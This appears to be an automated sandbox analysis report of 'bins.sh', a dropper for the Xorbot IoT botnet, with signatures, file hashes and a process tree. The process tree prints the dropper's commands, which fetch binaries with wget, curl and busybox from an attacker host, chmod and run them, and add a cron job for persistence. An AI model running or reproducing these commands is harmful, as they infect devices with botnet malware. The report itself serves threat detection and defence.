Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28/02/2025, 09:00

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    6fabcc812d0922db6c4f85ee41554bb8

  • SHA1

    6990196753003a0019eb7fd54ce7669dc28e1ce2

  • SHA256

    ffb51619f1efb0f87e5e75e7cd498cd8d80c049d07b821f83b3385cad45acb84

  • SHA512

    c73c9f0896fd6274600bda9d0f047435578793c2ad71e2be682c615afff82b0dc09bfe59fbfe4904b9d15ab1247a6310ebd1f324f15479aac96fef76af9953d3

  • SSDEEP

    192:CFj0rsk8cNUkQceCrt5H1l8dJ7t5lAk8IUkQceCzS:CB05NUkQceCj1edPUkQceC2

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • Contacts a large (1765) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 2 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 8 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 6 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    PID:674
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:679
      • /usr/bin/wget
        wget http://conn.masjesu.zip/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:681
      • /usr/bin/curl
        curl -O http://conn.masjesu.zip/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
        2⤵
        • Checks CPU configuration
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:691
      • /bin/busybox
        /bin/busybox wget http://conn.masjesu.zip/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:709
      • /bin/chmod
        chmod 777 6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
        2⤵
        • File and Directory Permissions Modification
        PID:712
      • /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
        ./6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
        2⤵
          PID:713
        • /bin/rm
          rm 6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn
          2⤵
            PID:715
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:717
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
            2⤵
            • Checks CPU configuration
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:728
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:735
          • /bin/chmod
            chmod 777 HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
            2⤵
            • File and Directory Permissions Modification
            PID:737
          • /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
            ./HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
            2⤵
            • Renames itself
            • Reads runtime system information
            PID:739
            • /bin/sh
              sh -c "crontab -l"
              3⤵
                PID:741
                • /usr/bin/crontab
                  crontab -l
                  4⤵
                    PID:742
                • /bin/sh
                  sh -c "crontab -"
                  3⤵
                    PID:744
                    • /usr/bin/crontab
                      crontab -
                      4⤵
                      • Creates/modifies Cron job
                      PID:746
                • /bin/rm
                  rm HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
                  2⤵
                    PID:749
                  • /usr/bin/wget
                    wget http://conn.masjesu.zip/bins/hWHYBvRhtT1f8VRbCvqxcgu6yhHX0Fv0kt
                    2⤵
                    • System Network Configuration Discovery
                    PID:753
                  • /usr/bin/curl
                    curl -O http://conn.masjesu.zip/bins/hWHYBvRhtT1f8VRbCvqxcgu6yhHX0Fv0kt
                    2⤵
                    • System Network Configuration Discovery
                    PID:754

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn

                  Filesize

                  122KB

                  MD5

                  cd3d4b9c643e5b473fb4d88ed05f0716

                  SHA1

                  64ee7a97418583d759eaea8000890cc3bae1b5f4

                  SHA256

                  0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

                  SHA512

                  164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

                • /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf

                  Filesize

                  177KB

                  MD5

                  786d75a158fe731feca3880f436082c0

                  SHA1

                  79ea2734e43d00cdeabed5586b2c1994d02aef3e

                  SHA256

                  5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                  SHA512

                  7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                • /var/spool/cron/crontabs/tmp.ly2K78

                  Filesize

                  210B

                  MD5

                  06764c557c35627777378eb207e980bc

                  SHA1

                  77eae38157e9ee9c28dcae5b29b0b79ea3d45cdd

                  SHA256

                  6c4cbb07e05248100deeae3256c2b765ab16205da317b62fc8ff6a859da5c508

                  SHA512

                  95ff42eadd41143e2d4058049881725b8395c9f23f43ae503ad8b634af449aa5f29c9b590b28ab467a1b87c2c0d69accd0c153ee6c3800b52925b3c130985054